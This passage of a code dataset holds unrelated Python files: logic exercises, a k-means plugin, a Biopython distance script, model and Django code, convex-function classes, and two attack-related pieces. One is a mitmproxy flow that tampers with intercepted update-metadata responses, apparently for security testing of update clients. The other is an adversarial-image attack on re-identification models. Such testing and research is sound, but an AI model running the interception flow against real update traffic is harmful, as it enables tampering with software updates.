1\r\ny = 3\r\nfor x in range(0,10):\r\n i = i + y\r\n y = y + 2\r\n print(i)\r\nprint(\"=-\" * 30)\r\n\r\nD = [4, 16, 36, 64]\r\n\r\n\r\n\r\natual = 2\r\nproximo = atual*atual\r\nmultiplicador = atual + 2\r\nfor x in range(0,10) :\r\n proximo = atual*atual\r\n multiplicador = atual + 2\r\n atual = multiplicador\r\n print(proximo)\r\nprint(\"=-\" * 30)\r\n\r\nE = [1, 1, 2, 3, 5, 8]\r\n\r\nanterior = 1\r\nproximo = 1\r\nsoma = anterior + proximo\r\n\r\nfor x in range(0,10) :\r\n soma = anterior + proximo\r\n anterior = proximo\r\n proximo = soma\r\n print(soma)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"gabpesouza/desafioEstagio","sub_path":"exercicios_logica.py","file_name":"exercicios_logica.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"75067617681","text":"\"\"\"Calculate K meanss clustering\"\"\"\nfrom plugin import Statistics\nimport wx\nfrom numpy import array\ntry:\n from Pycluster import kcluster\nexcept ImportError:\n from Bio.Cluster import kcluster\n\nclass KMeans(Statistics):\n \"\"\"plugin for calculating kmeans\"\"\"\n name = \"Kmeans\"\n def Main(self, model):\n \"\"\"calculate kmeans\"\"\"\n self.model = model\n data = self.model.GetCurrentData()[:]\n \n nclusters = wx.GetNumberFromUser(\"Kmeans Dialog\",\n \"Enter number of clusters\",\n \"Kmeans nclusters\",\n 1)\n\n z, error, found = 
kcluster(data, nclusters=nclusters) #IGNORE:W0612\n self.model.NewGroup('Kmeans%02d' % nclusters)\n self.model.hdf5.createArray(self.model.current_group, 'z', array(z))\n self.model.update()\n \n \n","repo_name":"cliburn/flow","sub_path":"src/plugins/statistics/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"71231963603","text":"import sys\n\nfrom mitmproxy import ctx\nfrom mitmproxy.http import HTTPFlow\nfrom random import randrange\n\nfrom api.datatypes.metadata import Metadata\nfrom api.utils import is_metadata\n\n\ndef response(flow: HTTPFlow) -> None:\n if is_metadata(flow):\n ctx.log.info(f\"Randomize the signed version...\")\n else:\n ctx.log.debug(\"skipping non-metadata response...\")\n return\n\n try:\n meta = Metadata.from_flow(flow)\n new_version = randrange(sys.maxsize)\n ctx.log.debug(f\"replacing metadata version {meta.version} with {new_version}\")\n meta.version = new_version\n\n flow.response.headers[\"x-mitm-flow\"] = \"randomize_version\"\n flow.response.content = meta.to_json().encode(\"UTF-8\")\n except Exception as e:\n ctx.log.error(f\"Processing error: {e}\")\n ctx.log.debug(e.__traceback__)\n","repo_name":"advancedtelematic/tuf-mitm-proxy","sub_path":"flows/randomize_version.py","file_name":"randomize_version.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35586503005","text":"#! /usr/bin/python3\n\n\"\"\"\n Determine the list of residues whose CA atoms are closer than 20 Å\n\"\"\"\n\nimport argparse\n\nfrom Bio.PDB.NeighborSearch import NeighborSearch\nfrom Bio.PDB.PDBParser import PDBParser\n\n\ndef atom_id(at):\n \"\"\" Function to build a friendly representation \n of an atom id like ARG A23.CA \n \"\"\"\n res = at.get_parent()\n chain = res.get_parent()\n return \"{} {}{}.{}\".format (res.get_resname(), chain.id, res.id[1], at.id)\n \nparser = argparse.ArgumentParser (\n prog='exercise2', \n description='Getting CA pairs within max dist',\n usage='exercise2.py [options] pdb_file [> output_file]'\n)\n\nparser.add_argument(\n '--maxdist', \n action='store', \n dest='max_dist',\n default=20,\n type=float,\n help='Max contact distance (A)'\n)\n\nparser.add_argument('pdb_file',help='Input PDB', type=open)\n\nargs = parser.parse_args()\n\nfor k, v in vars(args).items():\n print ('{:10}:'.format(k), v)\n\nprint(\"PDB.filename:\", args.pdb_file.name)\n\nparser = PDBParser(PERMISSIVE=1)\n\nprint ('Parsing', args.pdb_file)\n\n# load structure from PDB file of PDB ifle handler\nst = parser.get_structure('STR', args.pdb_file.name)\n\n# collecting CA atoms \nca_atoms=[]\n\nfor at in st.get_atoms():\n if at.id == 'CA':\n ca_atoms.append(at)\n\nprint (len(ca_atoms), 'CA Atoms found')\n\n# Preparing search\nnbsearch = NeighborSearch(ca_atoms)\n\nat_pairs = nbsearch.search_all(args.max_dist)\n\n# Output sorted by atom,serial_number, nbsearch returns ordered pairs\n# Redirect the output with > output_list\nfor at1, at2 in sorted(at_pairs, key=lambda at_pair: at_pair[0].serial_number):\n print (atom_id(at1), \":\", atom_id(at2), at1-at2)\n","repo_name":"jlgelpi/Biophysics2019-20","sub_path":"Session1_Solved/ex2/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38830029597","text":"\"\"\"\nauthor: 
Huiwang Liu\ne-mail: liuhuiwang1025@outlook.com\n\"\"\"\n\nimport random\nfrom copy import deepcopy\nfrom functools import partial\nfrom pathlib import Path\n\nimport kornia as K\nimport torch\nimport torch.nn as nn\nfrom pytorch_metric_learning.losses import TripletMarginLoss\nfrom pytorch_metric_learning.miners import BatchHardMiner\nfrom torch.utils import data\nfrom torchvision.utils import save_image\nfrom tqdm.auto import tqdm\n\nfrom pytorch_reid_models.reid_models.data import build_train_dataloader\nfrom pytorch_reid_models.reid_models.utils import set_seed, setup_logger\nfrom reid_attack.attacker_base import TransferAttackBase\n\n# 'third_party/torchattacks/wrappers/lgv.py' not available\nclass EnsMIFGSM:\n def __init__(\n self,\n random_ens_model,\n eps=8 / 255,\n alpha=1 / 255,\n steps=50,\n decay=1.0,\n # len_kernel=15,\n # nsig=3,\n # resize_rate=0.9,\n # diversity_prob=0.5,\n random_start=True,\n ):\n self.random_ens_model = random_ens_model\n self.random_ens_model.eval()\n self.eps = eps\n self.steps = steps\n self.decay = decay\n self.alpha = alpha\n # self.resize_rate = resize_rate\n # self.diversity_prob = diversity_prob\n self.random_start = random_start\n # self.len_kernel = (len_kernel, len_kernel)\n # self.nsig = (nsig, nsig)\n\n self.device = next(random_ens_model.parameters()).device\n\n # def input_diversity(self, x):\n # img_size = x.shape[-1]\n # img_resize = int(img_size * self.resize_rate)\n\n # if self.resize_rate < 1:\n # img_size = img_resize\n # img_resize = x.shape[-1]\n\n # rnd = torch.randint(\n # low=img_size, high=img_resize, size=(1,), dtype=torch.int32\n # ).item()\n # ratio = x.shape[2] / x.shape[3]\n # rescaled = F.interpolate(\n # x, size=[int(rnd * ratio), rnd], mode=\"bilinear\", align_corners=False\n # )\n # h_rem = int((img_resize - rnd) * ratio)\n # w_rem = img_resize - rnd\n # pad_top = torch.randint(low=0, high=h_rem, size=(1,), dtype=torch.int32).item()\n # pad_bottom = h_rem - pad_top\n # pad_left = torch.randint(low=0, high=w_rem, size=(1,), dtype=torch.int32).item()\n # pad_right = w_rem - pad_left\n\n # padded = F.pad(\n # rescaled,\n # [pad_left, pad_right, pad_top, pad_bottom],\n # value=0,\n # )\n\n # return padded if torch.rand(1) < self.diversity_prob else x\n\n def forward(self, images):\n images = images.detach().to(self.device)\n\n criterion = partial(\n torch.nn.CosineEmbeddingLoss(), target=torch.ones(1, device=self.device)\n )\n\n momentum = torch.zeros_like(images).detach().to(self.device)\n\n adv_images = images.clone().detach()\n if self.random_start:\n # Starting at a uniformly random point\n adv_images = adv_images + torch.empty_like(adv_images).uniform_(\n -self.eps, self.eps\n )\n adv_images = torch.clamp(adv_images, min=0, max=1).detach()\n\n for _ in range(self.steps):\n adv_images.requires_grad = True\n\n feats_list = self.random_ens_model(images)\n # adv_feats_list = self.random_ens_model(\n # self.input_diversity(adv_images), use_last_models=True\n # )\n adv_feats_list = self.random_ens_model(adv_images, use_last_models=True)\n\n # Calculate loss\n loss = sum(\n [\n criterion(adv_feats, feats)\n for adv_feats, feats in zip(adv_feats_list, feats_list)\n ]\n )\n\n # Update adversarial images\n grad = torch.autograd.grad(\n loss, adv_images, retain_graph=False, create_graph=False\n )[0]\n\n # depth wise conv2d\n # grad = K.filters.gaussian_blur2d(\n # grad, kernel_size=self.len_kernel, sigma=self.nsig\n # )\n grad = grad / torch.mean(torch.abs(grad), dim=(1, 2, 3), keepdim=True)\n grad = grad + momentum 
* self.decay\n momentum = grad\n\n adv_images = adv_images.detach() + self.alpha * grad.sign()\n delta = torch.clamp(adv_images - images, min=-self.eps, max=self.eps)\n adv_images = torch.clamp(images + delta, min=0, max=1).detach()\n\n return adv_images\n\n def __call__(self, images):\n return self.forward(images)\n\n\nclass RandomEnsModel(torch.nn.Module):\n def __init__(self, models_list, ens_num=1):\n super().__init__()\n self.models = torch.nn.ModuleList(models_list)\n self.ens_num = ens_num\n # Calculating clean features and adversarial features requires\n # ensuring that the models are the same\n self.last_indexes = None\n\n def forward(self, x, use_last_models=False):\n if use_last_models:\n assert self.last_indexes is not None\n indexes = self.last_indexes\n else:\n indexes = random.sample(range(len(self.models)), self.ens_num)\n self.last_indexes = indexes\n\n feats_list = [self.models[i](x) for i in indexes]\n\n return feats_list\n\n\nclass LGVAttack(TransferAttackBase):\n def _random_start(self, imgs, eps):\n imgs = imgs + torch.empty_like(imgs).uniform_(-eps, eps)\n imgs = torch.clamp(imgs, min=0, max=1).detach()\n return imgs\n\n def generate_adv(self, q_dataset, agent_model, g_dataset=None):\n collect_models = self.lgv_collect_models(\n agent_model, train_dataset_name=q_dataset.name\n )\n for model in collect_models:\n model.eval().requires_grad_(False)\n\n random_ens_model = RandomEnsModel(collect_models, ens_num=1)\n\n eps = 8 / 255\n attack = EnsMIFGSM(\n random_ens_model, eps=eps, alpha=1 / 255, steps=50, decay=1.0\n )\n\n all_adv_imgs, all_pids, all_camids = [], [], []\n q_dataloader = data.DataLoader(q_dataset, batch_size=32, num_workers=8)\n for imgs, pids, camids in tqdm(q_dataloader, desc=\"Generate adv\", leave=False):\n imgs, pids, camids = imgs.cuda(), pids.cuda(), camids.cuda()\n adv_imgs = attack(imgs)\n all_adv_imgs.append(adv_imgs.cpu())\n all_pids.append(pids.cpu())\n all_camids.append(camids.cpu())\n all_adv_imgs = torch.cat(all_adv_imgs)\n all_pids = torch.cat(all_pids)\n all_camids = torch.cat(all_camids)\n\n return data.TensorDataset(all_adv_imgs, all_pids, all_camids)\n\n @staticmethod\n def lgv_collect_models(\n agent_model, train_dataset_name, epoch=10, nb_models_epoch=4, lr=5e-2\n ):\n models_list = []\n models_path = Path(\"/tmp/lgv_models.pth\")\n if models_path.exists():\n state_dict_list = torch.load(models_path, map_location=\"cpu\")\n assert len(state_dict_list) == epoch * nb_models_epoch\n for state in state_dict_list:\n model = deepcopy(agent_model)\n model.eval().requires_grad_(False)\n model.load_state_dict(state)\n models_list.append(model)\n else:\n # Construct training data\n train_dataloader = build_train_dataloader(\n dataset_names=[train_dataset_name],\n per_dataset_num=None,\n transforms=[\"randomflip\"],\n batch_size=64,\n sampler=\"pk\",\n num_instance=8,\n )\n\n # Fine-tuning model\n model = deepcopy(agent_model)\n optimizer = torch.optim.SGD(\n model.parameters(),\n lr=lr,\n momentum=0.9,\n weight_decay=1e-4,\n )\n\n # Loss function\n miner = BatchHardMiner()\n criterion_t = TripletMarginLoss(margin=0.3)\n criterion_x = nn.CrossEntropyLoss(label_smoothing=0.1)\n\n # Start fine-tuning\n for e in range(epoch):\n model.train()\n save_points = torch.linspace(\n 0,\n len(train_dataloader) - 1,\n steps=nb_models_epoch + 1,\n dtype=torch.int64,\n )[1:]\n for i, (imgs, pids, _) in enumerate(\n tqdm(train_dataloader, desc=f\"Epoch {e}\", leave=False)\n ):\n imgs, pids = imgs.cuda(), pids.cuda()\n logits, feats = model(imgs)\n\n # FIXME: 
The pid relabel does not match the original model training code\n # (We tried adding the correct matching version of xent loss and the result was worse)\n # loss_x = criterion_x(logits, pids)\n hard_pairs = miner(feats, pids)\n loss_t = criterion_t(feats, pids, hard_pairs)\n # loss = loss_x + loss_t\n loss = loss_t\n\n optimizer.zero_grad(True)\n loss.backward()\n optimizer.step()\n\n if i in save_points:\n save_model = deepcopy(model)\n models_list.append(save_model)\n\n # Save model\n torch.save([m.state_dict() for m in models_list], models_path)\n\n return models_list\n\n\ndef main():\n setup_logger(name=\"pytorch_reid_models.reid_models\")\n setup_logger(name=\"__main__\")\n\n set_seed(42)\n\n LGVAttack().run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HWliiu/RobustReidResearch","sub_path":"reid_attack/lgv_attack.py","file_name":"lgv_attack.py","file_ext":"py","file_size_in_byte":9693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23532473037","text":"import torch\n\nfrom torch import nn\n\nfrom pythia.common.registry import registry\nfrom pythia.models.base_model import BaseModel\nfrom pythia.modules.layers import ConvNet, Flatten\n\n\n_TEMPLATES = {\n \"question_vocab_size\": \"{}_text_vocab_size\",\n \"number_of_answers\": \"{}_num_final_outputs\"\n}\n\n_CONSTANTS = {\n \"hidden_state_warning\": \"hidden state (final) should have 1st dim as 2\"\n}\n\n\n@registry.register_model(\"cnn_lstm\")\nclass CNNLSTM(BaseModel):\n \"\"\"CNNLSTM is a simple model for vision and language tasks. CNNLSTM is supposed to act\n as a baseline to test out your stuff without any complex functionality. Passes image\n through a CNN, and text through an LSTM and fuses them using concatenation. 
Then, it finally\n    passes the fused representation through an MLP to generate scores for each of the possible answers.\n\n    Args:\n        config (ConfigNode): Configuration node containing all of the necessary config required\n            to initialize CNNLSTM.\n\n    Inputs: sample_list (SampleList)\n        - **sample_list** should contain image attribute for image, text for question split into\n          word indices, targets for answer scores\n    \"\"\"\n    def __init__(self, config):\n        super().__init__(config)\n        self._global_config = registry.get(\"config\")\n        self._datasets = self._global_config.datasets.split(\",\")\n\n    def build(self):\n        assert len(self._datasets) > 0\n        num_question_choices = registry.get(\n            _TEMPLATES[\"question_vocab_size\"].format(self._datasets[0])\n        )\n        num_answer_choices = registry.get(\n            _TEMPLATES[\"number_of_answers\"].format(self._datasets[0])\n        )\n\n        self.text_embedding = nn.Embedding(\n            num_question_choices, self.config.text_embedding.embedding_dim\n        )\n        self.lstm = nn.LSTM(**self.config.lstm)\n\n        layers_config = self.config.cnn.layers\n        conv_layers = []\n        for i in range(len(layers_config.input_dims)):\n            conv_layers.append(\n                ConvNet(\n                    layers_config.input_dims[i],\n                    layers_config.output_dims[i],\n                    kernel_size=layers_config.kernel_sizes[i]\n                )\n            )\n        conv_layers.append(Flatten())\n        self.cnn = nn.Sequential(*conv_layers)\n\n        self.classifier = nn.Linear(self.config.classifier.input_dim, num_answer_choices)\n\n    def forward(self, sample_list):\n        self.lstm.flatten_parameters()\n\n        question = sample_list.text\n        image = sample_list.image\n\n        # Get (h_n, c_n), last hidden and cell state\n        _, hidden = self.lstm(self.text_embedding(question))\n        # X x B x H => B x X x H where X = num_layers * num_directions\n        hidden = hidden[0].transpose(0, 1)\n\n        # X should be 2 so we can merge in that dimension\n        assert hidden.size(1) == 2, _CONSTANTS[\"hidden_state_warning\"]\n\n        hidden = torch.cat([hidden[:, 0, :], hidden[:, 1, :]], dim=-1)\n        image = self.cnn(image)\n\n        # Fuse into single dimension\n        fused = torch.cat([hidden, image], dim=-1)\n        scores = self.classifier(fused)\n\n        return {\"scores\": scores}\n","repo_name":"microsoft/TAP","sub_path":"pythia/models/cnn_lstm.py","file_name":"cnn_lstm.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"3"} +{"seq_id":"25620144465","text":"from django.urls import path\nfrom .views import MoveListView,DramaListView,ActionListView,AnimationListView,DramaDetailView,ActionDetailView,AnimationDetailView\nurlpatterns = [\n    path('', MoveListView.as_view(), name='move_list'),\n    path('Drama/', DramaListView.as_view(),name='Drama_list'),\n    path('Action/', ActionListView.as_view(),name='Action_list'),\n    path('Animation/', AnimationListView.as_view(),name='Animation_list'),\n    path('Drama/<int:pk>/', DramaDetailView.as_view(),name='Drama_detail'),\n    path('Action/<int:pk>/', ActionDetailView.as_view(),name='Action_detail'),\n    path('Animation/<int:pk>/', AnimationDetailView.as_view(),name='Animation_detail')\n\n] ","repo_name":"WalaaAtiah/drf-api-permissions-postgres","sub_path":"Movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5943948389","text":"import abc\nimport contextlib\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow_mri.python.ops import array_ops\nfrom tensorflow_mri.python.util import deprecation\nfrom tensorflow_mri.python.ops import linalg_ops\nfrom 
tensorflow_mri.python.ops import math_ops\nfrom tensorflow_mri.python.util import api_util\nfrom tensorflow_mri.python.util import check_util\nfrom tensorflow_mri.python.util import linalg_ext\nfrom tensorflow_mri.python.util import linalg_imaging\nfrom tensorflow_mri.python.util import tensor_util\n\n\n@api_util.export(\"convex.ConvexFunction\")\nclass ConvexFunction():\n r\"\"\"Base class defining a [batch of] convex function[s].\n\n Represents a closed proper convex function\n :math:`f : \\mathbb{R}^{n}\\rightarrow \\mathbb{R}` or\n :math:`f : \\mathbb{C}^{n}\\rightarrow \\mathbb{R}`.\n\n Subclasses should implement the `_call` and `_prox` methods to define the\n forward pass and the proximal mapping, respectively. Gradients are\n provided by TensorFlow's automatic differentiation feature.\n\n This class exposes three properties to get static shape information:\n\n * `shape`: The static shape. Calls `_shape`.\n * `domain_dimension`: The static domain dimension, equal to `shape[-1]`.\n * `batch_shape`: The static batch shape, equal to `shape[:-1]`.\n\n Additionally there are three equivalent methods to get dynamic shape\n information:\n\n * `shape_tensor`: The dynamic shape. Calls `_shape_tensor`.\n * `domain_dimension_tensor`: The dynamic domain dimension, equal to\n `shape_tensor()[-1]`.\n * `batch_shape_tensor`: The dynamic batch shape, equal to\n `shape_tensor()[:-1]`.\n\n Subclasses may implement the methods `_shape` and `_shape_tensor` to provide\n custom static and dynamic shape information, respectively.\n \"\"\"\n def __init__(self,\n domain_dimension=None,\n scale=None,\n dtype=None,\n name=None):\n \"\"\"Initialize this `ConvexFunction`.\"\"\"\n if isinstance(domain_dimension, tf.compat.v1.Dimension):\n domain_dimension = domain_dimension.value\n self._domain_dimension = check_util.validate_rank(\n domain_dimension, 'domain_dimension', accept_none=True)\n\n self._dtype = tf.dtypes.as_dtype(dtype or tf.dtypes.float32)\n self._name = name or type(self).__name__\n\n if scale is None:\n scale = 1.0\n self._scale = tf.convert_to_tensor(scale, dtype=self.dtype.real_dtype)\n\n def __call__(self, x):\n return self.call(x)\n\n def call(self, x, name=None):\n \"\"\"Evaluate this `ConvexFunction` at input point[s] `x`.\n\n Args:\n x: A `tf.Tensor` of shape `[..., n]` and same dtype as `self`.\n name: A name for this operation (optional).\n\n Returns:\n A `tf.Tensor` of shape `[...]` and same dtype as `self`.\n \"\"\"\n with self._name_scope(name or \"call\"):\n x = tf.convert_to_tensor(x, name=\"x\")\n self._check_input_shape(x)\n self._check_input_dtype(x)\n return self._call(x)\n\n def prox(self, x, scale=None, name=None, **kwargs):\n \"\"\"Evaluate the proximal operator of this `ConvexFunction` at point[s] `x`.\n\n Args:\n x: A `tf.Tensor` of shape `[..., n]` and same dtype as `self`.\n scale: A scalar `float`. Additional scaling factor.\n name: A name for this operation (optional).\n **kwargs: A `dict`. 
Additional keyword arguments to pass to `_prox`.\n\n Returns:\n A `tf.Tensor` of shape `[..., n]` and same dtype as `self`.\n \"\"\"\n with self._name_scope(name or \"prox\"):\n x = tf.convert_to_tensor(x, name=\"x\")\n self._check_input_shape(x)\n self._check_input_dtype(x)\n return self._prox(x, scale=scale, **kwargs)\n\n def conj(self, name=None):\n \"\"\"Returns the convex conjugate of this `ConvexFunction`.\n\n Args:\n name: A name for this operation (optional).\n\n Returns:\n A `ConvexFunction` which represents the convex conjugate of `self`.\n \"\"\"\n with self._name_scope(name or \"conj\"):\n return self._conj()\n\n def shape_tensor(self, name=None):\n \"\"\"Returns the dynamic shape of this `ConvexFunction`.\n\n Args:\n name: A name for this operation (optional).\n\n Returns:\n A 1D integer `tf.Tensor`.\n \"\"\"\n with self._name_scope(name or \"shape_tensor\"):\n # Prefer to use statically defined shape if available.\n if self.shape.is_fully_defined():\n return tensor_util.convert_shape_to_tensor(\n self.shape.as_list(), name=\"shape\")\n return self._shape_tensor()\n\n def domain_dimension_tensor(self, name=None):\n \"\"\"Returns the dynamic domain dimension of this `ConvexFunction`.\n\n Subclasses get this for free once they implement `_shape_tensor`.\n\n Args:\n name: A name for this operation (optional).\n\n Returns:\n A scalar integer `tf.Tensor`.\n \"\"\"\n with self._name_scope(name or \"domain_dimension_tensor\"):\n # Prefer to use statically defined domain_dimension if available.\n if isinstance(self.domain_dimension, int):\n return tf.constant(self.domain_dimension, dtype=tf.int32)\n return self.shape_tensor()[-1]\n\n @deprecation.deprecated(\n '2022-08-07', 'Use `ConvexFunction.domain_dimension_tensor` instead.')\n def ndim_tensor(self, name=None): # pylint: disable=unused-argument\n \"\"\"Returns the dynamic domain dimension of this `ConvexFunction`.\n\n Args:\n name: A name for this operation (optional).\n\n Returns:\n A scalar integer `tf.Tensor`.\n \"\"\"\n return self.domain_dimension_tensor()\n\n def batch_shape_tensor(self, name=None):\n \"\"\"Returns the dynamic batch shape of this `ConvexFunction`.\n\n Subclasses get this for free once they implement `_shape_tensor`.\n\n Args:\n name: A name for this operation (optional).\n\n Returns:\n A 1D integer `tf.Tensor`.\n \"\"\"\n with self._name_scope(name or \"batch_shape_tensor\"):\n # Prefer to use statically defined shape if available.\n if self.batch_shape.is_fully_defined():\n return tensor_util.convert_shape_to_tensor(\n self.batch_shape.as_list(), name=\"shape\")\n return self.shape_tensor()[:-1]\n\n @abc.abstractmethod\n def _call(self, x):\n # Must be implemented by subclasses.\n raise NotImplementedError(\"Method `_call` is not implemented.\")\n\n def _prox(self, x, scale=None):\n # Must be implemented by subclasses.\n raise NotImplementedError(\"Method `_prox` is not implemented.\")\n\n def _conj(self):\n # Must be implemented by subclasses.\n raise NotImplementedError(\"Method `_conj` is not implemented.\")\n\n def _shape(self):\n \"\"\"Returns the static shape of this `ConvexFunction`.\n\n Has a default implementation based on the domain dimension.\n\n Returns:\n A `tf.TensorShape`.\n \"\"\"\n return tf.TensorShape([self._domain_dimension])\n\n def _shape_tensor(self):\n \"\"\"Returns the dynamic shape of this `ConvexFunction`.\n\n Returns:\n A 1D integer `tf.Tensor`.\n \"\"\"\n raise NotImplementedError(\"`_shape_tensor` is not implemented.\")\n\n @property\n def scale(self):\n \"\"\"The scaling 
factor.\"\"\"\n return self._scale\n\n @property\n def shape(self):\n \"\"\"The static shape of this `ConvexFunction`.\"\"\"\n return self._shape()\n\n @property\n def domain_dimension(self):\n \"\"\"The static domain dimension of this `ConvexFunction`.\"\"\"\n return self.shape[-1]\n\n @property\n def batch_shape(self):\n \"\"\"The static batch shape of this `ConvexFunction`.\"\"\"\n return self.shape[:-1]\n\n @property\n def dtype(self):\n \"\"\"The `DType` of `Tensors` handled by this `ConvexFunction`.\"\"\"\n return self._dtype\n\n @property\n def name(self):\n \"\"\"Name prepended to all ops created by this `ConvexFunction`.\"\"\"\n return self._name\n\n @contextlib.contextmanager\n def _name_scope(self, name=None):\n \"\"\"Helper function to standardize op scope.\"\"\"\n full_name = self.name\n if name is not None:\n full_name += \"/\" + name\n with tf.name_scope(full_name) as scope:\n yield scope\n\n def _check_input_shape(self, arg): # pylint: disable=missing-param-doc\n \"\"\"Check that arg.shape[-1] is compatible with self.domain_dimension.\"\"\"\n if arg.shape.rank is None:\n raise ValueError(\n \"Expected argument to have known rank, but found: {} \"\n \"in tensor {}\".format(arg.shape.rank, arg))\n if arg.shape.rank < 1:\n raise ValueError(\n \"Expected argument to have rank >= 1, but found: {} \"\n \"in tensor {}\".format(arg.shape.rank, arg))\n if not arg.shape[-1:].is_compatible_with([self.domain_dimension]):\n raise ValueError(\n \"Expected argument to have last dimension {}, but found: {} in \"\n \"tensor {}\".format(self.domain_dimension, arg.shape[-1], arg))\n\n def _check_input_dtype(self, arg):\n \"\"\"Check that arg.dtype == self.dtype.\"\"\"\n if arg.dtype.base_dtype != self.dtype:\n raise TypeError(\n \"Expected argument to have dtype {}, but found: {} \"\n \"in tensor {}\".format(self.dtype, arg.dtype, arg))\n\n\n@api_util.export(\"convex.ConvexFunctionAffineMappingComposition\")\nclass ConvexFunctionAffineMappingComposition(ConvexFunction):\n \"\"\"Composes a convex function and an affine mapping.\n\n Represents :math:`f(Ax + b)`, where :math:`f` is a `ConvexFunction`,\n :math:`A` is a `LinearOperator` and :math:`b` is a constant `Tensor`.\n\n Args:\n function: A `ConvexFunction`.\n operator: A `LinearOperator`. Defaults to the identity.\n constant: A `Tensor`. Defaults to 0.\n scale: A `float`. 
A scaling factor.\n name: A name for this operation.\n \"\"\"\n def __init__(self,\n function,\n operator=None,\n constant=None,\n scale=None,\n name=None):\n domain_dimension = (operator.domain_dimension if operator is not None\n else function.domain_dimension)\n super().__init__(domain_dimension=domain_dimension,\n scale=scale,\n dtype=function.dtype,\n name=name)\n self._function = function\n self._operator = operator\n self._constant = constant\n\n def _call(self, x):\n if self._operator is not None:\n x = self._operator.matvec(x)\n if self._constant is not None:\n x += self._constant\n return self._scale * self._function._call(x) # pylint: disable=protected-access\n\n def _prox(self, x, scale=None):\n # Prox difficult to evaluate for general linear operators.\n # TODO(jmontalt): implement prox for specific cases such as orthogonal\n # operators.\n raise NotImplementedError(\n f\"The proximal operator of {self.name} is not implemented or \"\n f\"does not have a closed form expression.\")\n\n @property\n def function(self):\n return self._function\n\n @property\n def operator(self):\n return self._operator\n\n @property\n def constant(self):\n return self._constant\n\n\n@api_util.export(\"convex.ConvexFunctionLinearOperatorComposition\")\nclass ConvexFunctionLinearOperatorComposition( # pylint: disable=abstract-method\n ConvexFunctionAffineMappingComposition):\n r\"\"\"Composes a convex function and a linear operator.\n\n Represents :math:`f(Ax)`, where :math:`f` is a `ConvexFunction` and\n :math:`A` is a `LinearOperator`.\n\n Args:\n function: A `ConvexFunction`.\n operator: A `LinearOperator`. Defaults to the identity.\n scale: A `float`. A scaling factor.\n name: A name for this operation.\n \"\"\"\n def __init__(self,\n function,\n operator=None,\n scale=None,\n name=None):\n super().__init__(function,\n operator=operator,\n scale=scale,\n name=name)\n\n\n@api_util.export(\"convex.ConvexFunctionIndicatorBall\")\nclass ConvexFunctionIndicatorBall(ConvexFunction): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` representing the indicator function of an Lp ball.\n\n Args:\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n order: A `float`. The order of the norm. Supported values are `1`, `2`,\n `np.inf`.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n dtype: A `tf.dtypes.DType`. The type of this `ConvexFunction`. 
Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n \"\"\"\n def __init__(self,\n domain_dimension,\n order,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(scale=scale, dtype=dtype, name=name)\n self._order = check_util.validate_enum(order, [1, 2, np.inf], name='order')\n\n self._domain_dimension_static, self._domain_dimension_dynamic = (\n _get_static_and_dynamic_dimension(domain_dimension))\n\n def _call(self, x):\n # Note that the scale has no effect, as the indicator function is always\n # zero or infinity.\n return math_ops.indicator_ball(x, order=self._order)\n\n def _prox(self, x, scale=None):\n # The proximal operator of the indicator function of a closed convex set\n # (such as the Lp ball) is the projection onto the set.\n return math_ops.project_onto_ball(x, order=self._order)\n\n def _conj(self):\n # The convex conjugate of the indicator function on the unit ball defined\n # by the Lp-norm is the dual norm function.\n return ConvexFunctionNorm(\n domain_dimension=self.domain_dimension,\n order=_conjugate_exponent(self._order),\n scale=self._scale,\n dtype=self.dtype,\n name=f\"{self.name}_conj\")\n\n def _shape(self):\n return tf.TensorShape([self._domain_dimension_static])\n\n def _shape_tensor(self):\n return tf.convert_to_tensor(\n [self._domain_dimension_dynamic], dtype=tf.int32)\n\n\n@api_util.export(\"convex.ConvexFunctionIndicatorL1Ball\")\nclass ConvexFunctionIndicatorL1Ball(ConvexFunctionIndicatorBall): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` representing the indicator function of an L1 ball.\n\n Args:\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n dtype: A `tf.dtypes.DType`. The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n\n References:\n .. [1] Parikh, N., & Boyd, S. (2014). Proximal algorithms. Foundations and\n Trends in optimization, 1(3), 127-239.\n \"\"\"\n def __init__(self,\n domain_dimension,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(domain_dimension=domain_dimension, order=1,\n scale=scale, dtype=dtype, name=name)\n\n\n@api_util.export(\"convex.ConvexFunctionIndicatorL2Ball\")\nclass ConvexFunctionIndicatorL2Ball(ConvexFunctionIndicatorBall): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` representing the indicator function of an L2 ball.\n\n Args:\n scale: A `float`. A scaling factor. Defaults to 1.0.\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n dtype: A `tf.dtypes.DType`. The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n\n References:\n .. [1] Parikh, N., & Boyd, S. (2014). Proximal algorithms. Foundations and\n Trends in optimization, 